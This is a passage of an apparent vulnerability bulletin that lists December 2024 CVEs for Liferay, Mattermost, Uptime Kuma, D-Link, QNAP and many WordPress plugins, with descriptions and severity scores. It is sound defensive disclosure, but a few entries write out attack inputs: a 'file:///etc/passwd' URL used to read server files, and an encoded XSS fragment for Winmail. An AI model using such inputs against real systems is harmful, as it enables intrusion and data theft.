Cross-site scripting (XSS) vulnerability in the edit Service Access Policy page in Liferay Portal 7.0.0 through 7.4.3.87, and Liferay DXP 7.4 GA through update 87, 7.3 GA through update 29, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a service access policy’s `Service Class` text field.
2024-12-17
4.8
CVE-2023-37940

Llus Corts–Better WP Login Page
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in LluÃs CortÃ¨s Better WP Login Page allows Stored XSS.This issue affects Better WP Login Page: from n/a through 1.1.2.
2024-12-16
5.9
CVE-2024-54442

logichunt–Portfolio Filterable Masonry Portfolio Gallery for Professionals
The Portfolio – Filterable Masonry Portfolio Gallery for Professionals plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘portfolio-pro’ shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-17
6.4
CVE-2024-11900

louislam–uptime-kuma
Uptime Kuma is an open source, self-hosted monitoring tool. An **Improper URL Handling Vulnerability** allows an attacker to access sensitive local files on the server by exploiting the `file:///` protocol. This vulnerability is triggered via the **"real-browser"** request type, which takes a screenshot of the URL provided by the attacker. By supplying local file paths, such as `file:///etc/passwd`, an attacker can read sensitive data from the server. This vulnerability arises because the system does not properly validate or sanitize the user input for the URL field. Specifically: 1. The URL input (`<input data-v-5f5c86d7="" id="url" type="url" class="form-control" pattern="https?://.+" required="">`) allows users to input arbitrary file paths, including those using the `file:///` protocol, without server-side validation. 2. The server then uses the user-provided URL to make a request, passing it to a browser instance that performs the "real-browser" request, which takes a screenshot of the content at the given URL. If a local file path is entered (e.g., `file:///etc/passwd`), the browser fetches and captures the file’s content. Since the user input is not validated, an attacker can manipulate the URL to request local files (e.g., `file:///etc/passwd`), and the system will capture a screenshot of the file’s content, potentially exposing sensitive data. Any **authenticated user** who can submit a URL in "real-browser" mode is at risk of exposing sensitive data through screenshots of these files. This issue has been addressed in version 1.23.16 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-20
6.8
CVE-2024-56331

madalinungureanu–Paid Membership Subscriptions Effortless Memberships, Recurring Payments & Content Restriction
The Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.4 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.
2024-12-18
5.3
CVE-2024-11291

magblogapi–NACC WordPress Plugin
The NACC WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘nacc’ shortcode in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-20
6.4
CVE-2024-12506

Mansur Ahamed–Ui Slider Filter By Price
Cross-Site Request Forgery (CSRF) vulnerability in Mansur Ahamed Ui Slider Filter By Price allows Cross Site Request Forgery.This issue affects Ui Slider Filter By Price: from n/a through 1.1.
2024-12-16
5.4
CVE-2024-54419

mantrabrain–Learning Management System, eLearning, Course Builder, WordPress LMS Plugin Sikshya LMS
The Learning Management System, eLearning, Course Builder, WordPress LMS Plugin – Sikshya LMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘page’ parameter in all versions up to, and including, 0.0.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
2024-12-17
6.1
CVE-2024-12127

Marco Giannini–XML Multilanguage Sitemap Generator
Missing Authorization vulnerability in Marco Giannini XML Multilanguage Sitemap Generator.This issue affects XML Multilanguage Sitemap Generator: from n/a through 2.0.6.
2024-12-16
5.3
CVE-2024-55999

Mattermost–Mattermost
Mattermost versions 10.1.x <= 10.1.2, 10.0.x <= 10.0.2, 9.11.x <= 9.11.4, 9.5.x <= 9.5.12 fail to properly validate the type ofÂ callPropsÂ which allows a user to cause a client side (webapp and mobile) DoS to users of particular channels, by sending a specially crafted post.
2024-12-16
6.5
CVE-2024-54083

Mattermost–Mattermost
Mattermost versions 10.1.x <= 10.1.2, 10.0.x <= 10.0.2, 9.11.x <= 9.11.4, 9.5.x <= 9.5.12 fail to limit the file size for slack import file uploads which allows a user toÂ cause a DoS via zip bomb by importing data in a team they are a team admin.
2024-12-16
6.5
CVE-2024-54682

Mattermost–Mattermost
Mattermost Android Mobile Apps versions <=2.21.0 fail to properly configure file providers which allows an attacker with local access to access files via file provider.
2024-12-16
5.7
CVE-2024-11358

Mattermost–Mattermost
Mattermost versions 10.1.x <= 10.1.2, 10.0.x <= 10.0.2, 9.11.x <= 9.11.4, and 9.5.x <= 9.5.12 fail to preventÂ concurrently checking and updating the failed login attempts. which allows an attacker to bypass of "Max failed attempts" restriction and send a big number of login attempts before being blocked via simultaneously sending multiple login requests
2024-12-16
4.8
CVE-2024-48872

Meini–Utech World Time
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Meini Utech World Time allows Stored XSS.This issue affects Utech World Time: from n/a through 1.0.
2024-12-16
6.5
CVE-2024-54441

memberful–Memberful Membership Plugin
The Memberful plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.73.9 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as site members.
2024-12-17
5.3
CVE-2024-11294

Microsoft–Windows
An access violation vulnerability exists in the DirectComposition functionality win32kbase.sys driver version 10.0.22000.593 as part of Windows 11 version 22000.593 and version 10.0.20348.643 as part of Windows Server 2022 version 20348.643. A specially-crafted set of syscalls can lead to a reboot. An unprivileged user can run specially-crafted code to trigger Denial Of Service.
2024-12-18
5
CVE-2022-40732

misskey-dev–misskey
Misskey is an open source, federated social media platform. Some APIs using `HttpRequestService` do not properly check the target host. This vulnerability allows an attacker to send POST or GET requests to the internal server, which may result in a SSRF attack.It allows an attacker to send POST or GET requests (with some controllable URL parameters) to private IPs, enabling further attacks on internal servers. This issue has been addressed in version 2024.11.0-alpha.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.
2024-12-18
6.4
CVE-2024-52579

mohammed_kaludi–AMP for WP Accelerated Mobile Pages
The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the disqus_name parameter in all versions up to, and including, 1.1.1 due to insufficient input validation. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
2024-12-18
6.1
CVE-2024-11254

moonheart–G Web Pro Store Locator
The G Web Pro Store Locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘q’ parameter in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
2024-12-21
6.1
CVE-2024-11682

motovnet–Ebook Store
The Ebook Store plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.8001. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
2024-12-21
6.1
CVE-2024-11287

motovnet–Ebook Store
The Ebook Store plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘step’ parameter in all versions up to, and including, 5.8001 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
2024-12-21
6.1
CVE-2024-12262

n/a–Emlog Pro
A vulnerability was found in Emlog Pro up to 2.4.1. It has been classified as problematic. This affects an unknown part of the file /admin/tag.php. The manipulation of the argument keyword leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
2024-12-20
4.3
CVE-2024-12841

n/a–Emlog Pro
A vulnerability was found in Emlog Pro up to 2.4.1. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/user.php. The manipulation of the argument keyword leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
2024-12-20
4.3
CVE-2024-12842

n/a–Emlog Pro
A vulnerability was found in Emlog Pro up to 2.4.1. It has been rated as problematic. This issue affects some unknown processing of the file /admin/plugin.php. The manipulation of the argument filter leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
2024-12-20
4.3
CVE-2024-12843

n/a–Emlog Pro
A vulnerability classified as problematic has been found in Emlog Pro up to 2.4.1. Affected is an unknown function of the file /admin/store.php. The manipulation of the argument tag leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
2024-12-20
4.3
CVE-2024-12844

n/a–Emlog Pro
A vulnerability, which was classified as problematic, has been found in Emlog Pro up to 2.4.1. Affected by this issue is some unknown functionality of the file /admin/link.php. The manipulation of the argument siteurl/icon leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
2024-12-21
4.3
CVE-2024-12846

n/a–InvoicePlane
A vulnerability was found in InvoicePlane up to 1.6.1. It has been declared as critical. This vulnerability affects the function upload_file of the file /index.php/upload/upload_file/1/1. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.6.2-beta-1 is able to address this issue. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.
2024-12-16
6.3
CVE-2024-12478

n/a–InvoicePlane
A vulnerability was found in InvoicePlane up to 1.6.1. It has been classified as problematic. This affects the function download of the file invoices.php. The manipulation of the argument invoice leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.6.2-beta-1 is able to address this issue. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.
2024-12-16
4.3
CVE-2024-12362

n/a–n/a
A NULL pointer dereference in D-Link DIR-860L REVB_FIRMWARE_2.04.B04_ic5b allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request.
2024-12-17
6.5
CVE-2024-37605

n/a–n/a
A Stack overflow vulnerability in D-Link DCS-932L REVB_FIRMWARE_2.18.01 allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request.
2024-12-17
6.5
CVE-2024-37606

n/a–n/a
A Buffer overflow vulnerability in D-Link DAP-2555 REVA_FIRMWARE_1.20 allows remote attackers to cause a Denial of Service (DoS) via a crafted HTTP request.
2024-12-17
6.5
CVE-2024-37607

n/a–n/a
A stored HTML Injection vulnerability was identified in PHPGurukul Online Birth Certificate System v1.0 in /user/certificate-form.php.
2024-12-17
6.1
CVE-2024-55059

n/a–n/a
Oqtane Framework is vulnerable to Insecure Direct Object Reference (IDOR) in Oqtane.Controllers.UserController. This allows unauthorized users to access sensitive information of other users by manipulating the id parameter.
2024-12-20
6.5
CVE-2024-55471

n/a–n/a
Winmail Server 4.4 is vulnerable to f_user=%22%3E%3Csvg%20onload Cross Site Scripting (XSS).
2024-12-18
6.1
CVE-2024-55492

n/a–n/a
A vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200, and MSG2300 3.90. The component affected by this issue is /upload_sfmig.php on the web interface. By crafting a suitable form name, arbitrary files can be uploaded, potentially leading to unauthorized access to server permissions.
2024-12-17
6.3
CVE-2024-55514

n/a–n/a
CyberPanel (aka Cyber Panel) before f0cf648 allows XSS via token or username to plogical/phpmyadminsignin.php.
2024-12-16
6.1
CVE-2024-56112

n/a–n/a
A vulnerability was found in Keycloak. The environment option `KC_CACHE_EMBEDDED_MTLS_ENABLED` does not work and the JGroups replication configuration is always used in plain text which can allow an attacker that has access to adjacent networks related to JGroups to read sensitive information.
2024-12-17
5.7
CVE-2024-10973

n/a–n/a
A NULL pointer dereference in the plugins_call_handle_uri_clean function of D-Link DAP-1520 REVA_FIRMWARE_1.10B04_BETA02_HOTFIX allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request without authentication.
2024-12-17
5.3
CVE-2024-36831

n/a–n/a
A stored cross-site scripting (XSS) vulnerability was identified in Phpgurukul Online Birth Certificate System 1.0 in /user/certificate-form.php via the full name field.
2024-12-17
5.4
CVE-2024-55056

n/a–n/a
Phpgurukul Online Birth Certificate System 1.0 suffers from insufficient password requirements which can lead to unauthorized access to user accounts.
2024-12-17
5.4
CVE-2024-55057

n/a–n/a
A URL redirection vulnerability exists in UJCMS 9.6.3 due to improper validation of URLs in the upload and rendering of new block / carousel items. This vulnerability allows authenticated attackers to redirect unprivileged users to an arbitrary, attacker-controlled webpage. When an authenticated user clicks on the malicious block item, they are redirected to the arbitrary untrusted domains, where sensitive tokens, such as JSON Web Tokens, can be stolen via a crafted webpage.
2024-12-16
5.4
CVE-2024-55452

n/a–n/a
Intrexx Portal Server before 12.0.2 allows XSS via a user-defined portlet.
2024-12-16
5.4
CVE-2024-55554

n/a–n/a
An issue was discovered in Logpoint before 7.5.0. Authenticated users can inject payloads while creating Search Template Dashboard. These are executed, leading to Server-Side Template Injection.
2024-12-16
5.9
CVE-2024-56085

n/a–n/a
An issue was discovered in Logpoint before 7.5.0. Authenticated users can inject payloads while querying Search Template Dashboard. These are executed, leading to Server-Side Template Injection.
2024-12-16
5.9
CVE-2024-56087

n/a–n/a
An HTML injection vulnerability in Sunbird DCIM dcTrack 9.1.2 allows attackers authenticated as administrators to inject arbitrary HTML code in an admin screen.
2024-12-16
4.8
CVE-2024-37773

n/a–n/a
A cross-site scripting (XSS) vulnerability in Sunbird DCIM dcTrack v9.1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in some admin screens.
2024-12-16
4.8
CVE-2024-37776

n/a–n/a
Keyfactor Remote File Orchestrator (aka remote-file-orchestrator) 2.8 before 2.8.1 allows Information Disclosure: sensitive information could be exposed at the debug logging level.
2024-12-18
4.3
CVE-2024-49201

n/a–n/a
An insecure direct object reference (IDOR) vulnerability was discovered in PHPGurukul Online Birth Certificate System v1.0. This vulnerability resides in the viewid parameter of /user/view-application-detail.php. Authenticated users can exploit this flaw by manipulating the viewid parameter in the URL to access sensitive birth certificate details of other users without proper authorization checks.
2024-12-17
4.3
CVE-2024-55058

n/a–n/a
A stored cross-site scripting (XSS) vulnerability in the component /admin/profile.php of Online Nurse Hiring System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the fullname parameter.
2024-12-16
4.8
CVE-2024-55100

n/a–n/a
An IDOR (Insecure Direct Object Reference) vulnerability exists in oqtane Framework 6.0.0, allowing a logged-in user to access inbox messages of other users by manipulating the notification ID in the request URL. By changing the notification ID, an attacker can view sensitive mail details belonging to other users.
2024-12-20
4.3
CVE-2024-55186

n/a–n/a
A stored cross-site scripting (XSS) vulnerability in Piranha CMS 11.1 allows remote attackers to execute arbitrary JavaScript in the web browser of a user, by creating a page via the /manager/pages and then adding a markdown content with the XSS payload.
2024-12-20
4.7
CVE-2024-55341

n/a–n/a
A file upload functionality in Piranha CMS 11.1 allows authenticated remote attackers to upload a crafted PDF file to /manager/media. This PDF can contain malicious JavaScript code, which is executed when a victim user opens or interacts with the PDF in their web browser, leading to a XSS vulnerability.
2024-12-20
4.7
CVE-2024-55342

n/a–n/a
A Stored Cross-Site Scripting (XSS) vulnerability exists in authenticated SVG file upload and viewing functionality in UJCMS 9.6.3. The vulnerability arises from insufficient sanitization of embedded attributes in uploaded SVG files. When a maliciously crafted SVG file is viewed by other backend users, it allows authenticated attackers to execute arbitrary JavaScript in the context of other backend users’ browsers, potentially leading to the theft of sensitive tokens.
2024-12-16
4.8
CVE-2024-55451

n/a–n/a
In Optimizely Configured Commerce before 5.2.2408, malicious payloads can be stored and subsequently executed in users’ browsers under specific conditions: XSS from JavaScript in an SVG document.
2024-12-18
4.7
CVE-2024-56173

n/a–PbootCMS
A vulnerability was found in PbootCMS up to 3.2.3. It has been classified as critical. This affects an unknown part of the file apps/home/controller/IndexController.php. The manipulation of the argument tag leads to code injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2.4 is able to address this issue. It is recommended to upgrade the affected component.
2024-12-19
6.3
CVE-2024-12789

n/a–PbootCMS
A vulnerability, which was classified as problematic, has been found in PbootCMS up to 5.2.3. Affected by this issue is some unknown functionality of the file apps/home/controller/IndexController.php. The manipulation of the argument tag leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.2.4 is able to address this issue. It is recommended to upgrade the affected component.
2024-12-19
4.3
CVE-2024-12793

NextGeography–NG Analyser
Authorization Bypass Through User-Controlled Key vulnerability in NextGeography NG Analyser allows Functionality Misuse.This issue affects NG Analyser: before 2.2.711.
2024-12-17
6.5
CVE-2024-9819

nicheaddons–Events Addon for Elementor
The Events Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.3 via the naevents_elementor_template shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.
2024-12-18
4.3
CVE-2024-12061

ninjateam–File Manager Pro Filester
The File Manager Pro – Filester plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ‘ajax_install_plugin’ function in all versions up to, and including, 1.8.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install the Filebird plugin.
2024-12-19
4.3
CVE-2024-12331

Open Tools–WooCommerce Basic Ordernumbers
Missing Authorization vulnerability in Open Tools WooCommerce Basic Ordernumbers allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Basic Ordernumbers: from n/a through 1.4.4.
2024-12-16
5.4
CVE-2024-55992

outdooractive–Outdooractive Embed
The Outdooractive Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘list2go’ shortcode in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-20
6.4
CVE-2024-11774

philantro–Philantro Donations and Donor Management
The Philantro – Donations and Donor Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s shortcodes like ‘donate’ in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-18
6.4
CVE-2024-12500

PickPlugins–Job Board Manager
Missing Authorization vulnerability in PickPlugins Job Board Manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Job Board Manager: from n/a through 2.1.60.
2024-12-16
5.3
CVE-2024-55993

pingmeter–Pingmeter Uptime Monitoring
The Pingmeter Uptime Monitoring plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘_wpnonce’ parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
2024-12-21
6.1
CVE-2024-11808

Pixelgrade–PixProof
Missing Authorization vulnerability in Pixelgrade PixProof allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects PixProof: from n/a through 2.0.1.
2024-12-16
5.3
CVE-2024-54417

pkthree–Peters Custom Anti-Spam
The Peter’s Custom Anti-Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.3. This is due to missing nonce validation on the cas_register_post() function. This makes it possible for unauthenticated attackers to blacklist emails via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
2024-12-18
5.4
CVE-2024-12554

pluginsandsnippets–Simple Page Access Restriction
The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.29 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.
2024-12-18
5.3
CVE-2024-11295

Pluginscafe–Advanced Data Table For Elementor
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pluginscafe Advanced Data Table For Elementor allows Stored XSS.This issue affects Advanced Data Table For Elementor: from n/a through 1.0.0.
2024-12-16
6.5
CVE-2024-54443

Posti–Posti Shipping
Cross-Site Request Forgery (CSRF) vulnerability in Posti Posti Shipping allows Cross Site Request Forgery.This issue affects Posti Shipping: from n/a through 3.10.3.
2024-12-16
6.5
CVE-2024-56005

premila–Gutensee
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in premila Gutensee allows DOM-Based XSS.This issue affects Gutensee: from n/a through 1.0.1.
2024-12-16
6.5
CVE-2024-54360

puckrobin–WP BASE Booking of Appointments, Services and Events
The WP BASE Booking of Appointments, Services and Events plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘status’ parameter in all versions up to, and including, 4.9.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
2024-12-17
6.1
CVE-2024-12469

puckrobin–WP BASE Booking of Appointments, Services and Events
The WP BASE Booking of Appointments, Services and Events plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_db function in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to expose sensitive information from the database, such as the hashed administrator password.
2024-12-21
6.5
CVE-2024-12558

QNAP Systems Inc.–QTS
An uncontrolled resource consumption vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2277 and later QTS 4.5.4.2280 build 20230112 and later QuTS hero h5.0.1.2277 build 20230112 and later QuTS hero h4.5.4.2374 build 20230417 and later QuTScloud c5.0.1.2374 and later
2024-12-19
6.8
CVE-2022-27600

QNAP Systems Inc.–QuFirewall
A command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to execute arbitrary commands. We have already fixed the vulnerability in the following versions: QuFirewall 2.3.3 ( 2023/03/27 ) and later and later
2024-12-19
5.5
CVE-2023-23356

QNAP Systems Inc.–QuLog Center
A cross-site scripting (XSS) vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow remote attackers who have gained administrator access to bypass security mechanisms or read application data. We have already fixed the vulnerability in the following versions: QuLog Center 1.5.0.738 ( 2023/03/06 ) and later QuLog Center 1.4.1.691 ( 2023/03/01 ) and later QuLog Center 1.3.1.645 ( 2023/02/22 ) and later
2024-12-19
4.8
CVE-2023-23357

quomodosoft–ElementsReady Addons for Elementor
The ElementsReady Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.8 in inc/Widgets/accordion/output/content.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.
2024-12-17
4.3
CVE-2024-10356

Ram Segev–Leader
Missing Authorization vulnerability in Ram Segev Leader allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Leader: from n/a through 2.6.1.
2024-12-16
4.3
CVE-2024-56007

reactflow–Reactflow Visitor Recording and Heatmaps
The Reactflow Visitor Recording and Heatmaps plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.10. This is due to missing or incorrect nonce validation affecting the _wpnonce parameter. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
2024-12-21
6.1
CVE-2024-11975

realmaster-1–real.Kit
The real.Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-21
6.4
CVE-2024-12697

Red Hat–Red Hat OpenShift Container Platform 4
An incomplete fix for ose-olm-catalogd-container was issued for the Rapid Reset Vulnerability (CVE-2023-39325/CVE-2023-44487) where only unauthenticated streams were protected, not streams created by authenticated sources.
2024-12-18
6.5
CVE-2024-12698

Red Hat–Red Hat Satellite 6
A server-side request forgery exists in Satellite. When a PUT HTTP request is made to /http_proxies/test_connection, when supplied with the http_proxies variable set to localhost, the attacker can fetch the localhost banner.
2024-12-20
5
CVE-2024-12840

rewardsfuel–Contests by Rewards Fuel
The Contests by Rewards Fuel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘RF_CONTEST’ shortcode in all versions up to, and including, 2.0.65 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-18
6.4
CVE-2024-12513

rluks–Embed Twine
The Embed Twine plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ’embed_twine’ shortcode in all versions up to, and including, 0.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-20
6.4
CVE-2024-12509

Ryan–Bet sport Free
Cross-Site Request Forgery (CSRF) vulnerability in Ryan Bet sport Free allows Cross Site Request Forgery.This issue affects Bet sport Free: from n/a through 1.0.0.
2024-12-16
4.3
CVE-2024-54396

seopilot–Wtyczka SeoPilot dla WP
The Wtyczka SeoPilot dla WP plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.091. This is due to missing or incorrect nonce validation on the SeoPilot_Admin_Options() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
2024-12-20
6.1
CVE-2024-11812

shabti–Frontend Admin by DynamiApps
The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to SQL Injection via the ‘orderby’ parameter in all versions up to, and including, 3.25.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This requires an unauthenticated user to have been given permission to view form submissions, and the form submission shortcode be added to a page.
2024-12-21
5.9
CVE-2024-11722

ShineTheme–Travel Booking WordPress Theme
The Travel Booking WordPress Theme theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ‘__stPartnerCreateServiceRental’, ‘st_delete_order_item’, ‘_st_partner_approve_booking’, ‘save_order_item’, and ‘__userDenyEachInfo’ functions in all versions up to, and including, 3.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify posts, delete posts and pages, approve arbitrary orders, insert orders with arbitrary prices, and deny user information.
2024-12-18
6.5
CVE-2024-11926

Sierra Wireless–AirVantage, AirVantage-Capable Devices: All Sierra Wireless devices.
An AirVantage online Warranty Checker tool vulnerability could allow an attacker to perform bulk enumeration of IMEI and Serial Numbers pairs. The AirVantage Warranty Checker is updated to no longer return the IMEI and Serial Number in addition to the warranty status when the Serial Number or IMEI is used to look up warranty status.
2024-12-21
5.3
CVE-2023-31280

silabs.com–RS9116 Bluetooth SDK
The L2CAP receive data buffer for L2CAP packets is restricted to packet sizes smaller than the maximum supported packet size. Receiving a packet that exceeds the restricted buffer length may cause a crash. A hard reset is required to recover the crashed device.
2024-12-19
6.5
CVE-2024-7137

silabs.com–RS9116 Bluetooth SDK
An assert may be triggered, causing a temporary denial of service when a peer device sends a specially crafted malformed L2CAP packet. If a watchdog timer is not enabled, a hard reset is required to recover the device.
2024-12-19
6.5
CVE-2024-7138

silabs.com–RS9116 Bluetooth SDK
Due to an unchecked buffer length, a specially crafted L2CAP packet can cause a buffer overflow. This buffer overflow triggers an assert, which results in a temporary denial of service.Â If a watchdog timer is not enabled, a hard reset is required to recover the device.
2024-12-19
6.5
CVE-2024-7139

sisoog–
The Ø§Ø³ØªØ®Ø±Ø§Ø¬ Ù…ØØµÙˆÙ„Ø§Øª ÙˆÙˆÚ©Ø§Ù…Ø±Ø³ Ø¨Ø±Ø§ÛŒ Ø¢ÛŒØ³ÛŒ plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
2024-12-20
6.1
CVE-2024-11331

slopeit–Slope Widgets
The Slope Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘slope-reservations’ shortcode in all versions up to, and including, 4.2.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-17
6.4
CVE-2024-11902

smub–Easy Digital Downloads eCommerce Payments and Subscriptions made easy
The Easy Digital Downloads – eCommerce Payments and Subscriptions made easy plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.2 via the file download functionality. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.
2024-12-21
4.9
CVE-2024-12875

socratous139–Spotlightr
The Spotlightr plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘spotlightr-v’ shortcode in all versions up to, and including, 0.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
2024-12-20
6.4
CVE-2024-11411

solitweb–Full Screen Menu for Elementor
